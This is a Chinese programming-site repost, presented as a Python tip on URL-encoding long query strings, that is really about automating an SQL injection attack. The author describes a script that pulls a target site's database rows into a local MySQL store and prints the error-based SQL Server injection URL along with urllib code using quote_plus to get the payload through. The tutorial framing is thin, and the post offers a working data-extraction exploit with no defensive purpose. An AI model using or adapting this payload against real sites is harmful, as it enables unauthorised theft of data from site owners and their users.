iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > Python >Python技巧_处理带参数的超长URL
  • 746
分享到

Python技巧_处理带参数的超长URL

参数技巧Python 2023-01-31 05:01:53 746人浏览 安东尼

Python 官方文档:入门教程 => 点击学习

摘要

今天写了个脚本 主要就是实现利用sqlInj点直接把数据获取到本地并存到Mysql数据库中 学过python的都知道可以使用urllib2中的request()方法直接打开Url,但仅限于url后没有跟复杂的参数串 今天我利用的Url是 H

今天写了个脚本 主要就是实现利用sqlInj点直接把数据获取到本地并存到Mysql数据库

学过python的都知道可以使用urllib2中的request()方法直接打开Url,但仅限于url后没有跟复杂的参数串

今天我利用的Url是

Http://xxx.com/xxx.aspx?jobType=-1&subJobType=-1&jobdq=-1&jobTime=-1&keyWord=1' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top 22 cast(CONTENT as varchar) from xxx.dbo.xxx))=0--

开始我也直接用以下语句测试的:

url="上面的URL"

req=urllib2.Request(url)

urllib2.urlopen(req)

可是执行后一直提示500错误,由此可以发现应该是Python在对Url进行编码的时候更改了某些特殊字符造成Url失效

我们可以用urllib2或urllib的quote()方法控制对特殊字符的URL编码,这里推荐用 urllib下的quote_plus()方法,它将空格转化成'+'而非%20通用性更好。

我们更改后的代码如下:

url = "http://xxx.com/xxx.aspx?jobType=-1&subJobType=-1&jobdq=-1&jobTime=-1&keyWord=1' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top "+str(count)+" cast(CONTENT as varchar) from xxx.dbo.xxx))=0--" 

quoteUrl=urllib.quote_plus(url,safe=':\'/?&=()')

fd = urllib.urlopen(quoteUrl)

这样我们就可以正常的提取数据了

--结束END--

本文标题: Python技巧_处理带参数的超长URL

本文链接: https://www.lsjlt.com/news/188475.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作